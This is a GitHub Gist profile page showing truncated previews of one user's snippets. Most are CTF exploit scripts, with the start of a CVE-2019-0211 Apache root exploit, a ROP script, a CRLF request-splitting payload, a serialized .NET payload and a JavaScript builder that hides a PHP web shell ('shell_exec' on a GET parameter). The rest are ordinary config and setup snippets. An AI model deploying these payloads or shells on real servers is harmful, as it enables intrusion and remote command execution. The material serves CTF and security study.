Skip to content

Instantly share code, notes, and snippets.

View LoadLow's full-sized avatar
🎯
Focusing

Load. LoadLow

🎯
Focusing
24 followers · 50 following
  • France
View GitHub Profile
@LoadLow
LoadLow / carpediem.php
Last active April 15, 2019 09:48
Easier to test : close to 100% rate by flooding the page that sleep at the end of the exploit ('cause it will spawn more workers) + graceful restart
<?php
# CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
# Charles Fol
# @cfreal_
# 2019-04-08
#
# INFOS
#
# https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
#
@LoadLow
LoadLow / hardened-bird.service
Last active April 15, 2019 11:11
[Unit]
Description=BIRD routing daemon
#After=network-online.target
#Wants=network-online.target
After=network.target
[Service]
Type=forking
ExecStart=/usr/sbin/bird -c /etc/bird.conf -u bird -g bird
ExecReload=/usr/bin/birdc configure
@LoadLow
LoadLow / rop.py
Created October 28, 2018 06:50
SECCON 2018 - Classic elf64 ROP with ASLR + NX bit
from pwn import *
from struct import *
seip_offset = 72
def main():
context(arch='amd64', os='linux')
# ASLR + NX bit
binary = ELF("samples/classic.elf64")
@LoadLow
LoadLow / pwn-not-random.py
Last active April 8, 2018 18:03
INS'HACK CTF 2018 - Prog Not random - PRNG Predictability - RushB%
import socket
import subprocess
import time
# https://github.com/eboda/mersenne-twister-recover
from MTRecover import MT19937Recover
class Netcat:
def __init__(self, ip, port):
@LoadLow
LoadLow / pwn_curler.py
Last active April 8, 2018 18:04
INS'HACK CTF 2018 - Web Curler - HTTP request splitting to replace aria2c options, then, use aria2c options to execute our sh commands - RushB%
import bson
CRLF = '\\u000D\\u000A'
def make_payload(url, inject_config):
inject_hostname = "localhost"
pld = url + " HTTP/1.1" + CRLF
pld += "Host: " + inject_hostname + CRLF
pld += "Accept-Encoding: identity" + CRLF
@LoadLow
LoadLow / Readme.md
Last active November 5, 2018 23:34
INS'HACK CTF 2018 - Web Crypt0r part 2 - Extend the hash - RushB%

  1. Guessed integrity check : user : hash : b64_encoded_info in cookie user

  2. info in YAML format

  3. Some YAML parsers allow to redefine the same key, that replaces the old value

  4. We have a hint : /src-code/ contains a swp file, original file was removed. It's easy to extract from it the src code of the web app. Of course it's a double-key permissive YAML parser

@LoadLow
LoadLow / recover_key.py
Last active April 8, 2018 18:05
NDH quals CTF 2018 - Rev SoStealthy - RushB%
import base64
pld = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" + \
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" + \
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" + \
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" + \
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" + \
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" + \
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" + \
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" + \
@LoadLow
LoadLow / mk_payload.js
Last active April 8, 2018 18:05
NDH quals CTF 2018 - Web PixEditor - RushB%
var phpcode = "die(shell_exec($_GET['b']));";
var pld = " <?php \r\n"+phpcode+"\r\n//";
var canvas = document.createElement("canvas");
var ctx = canvas.getContext('2d');
var pos = 0, r, g, b;
for(var i=0; i<32; ++i) {
for(var j=0; j<32; ++j) {
@LoadLow
LoadLow / ngx_http_modsecurity.c
Last active May 10, 2017 02:58
Fix 500 Internal errors on POST requests with Nginx + modsecurity + OWASP rules
/*
* ModSecurity for Apache 2.x, http://www.modsecurity.org/
* Copyright (c) 2004-2013 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
@LoadLow
LoadLow / setup.bash
Last active May 3, 2016 09:01
Setup & Fix rubypython ubuntu/debian
sudo apt-get install ruby ruby-dev python2.7 python2.7-dev
sudo gem install ffi
sudo gem install rubypython
cd /usr/lib
# For ubuntu 14.04(AMD64/x86_64)
sudo ln -s /usr/lib/python2.7/config-x86_64-linux-gnu/libpython2.7.so
sudo ln -s /usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0
# For ubuntu 14.04(x86)
sudo ln -s /usr/lib/python2.7/config-i386-linux-gnu/libpython2.7.so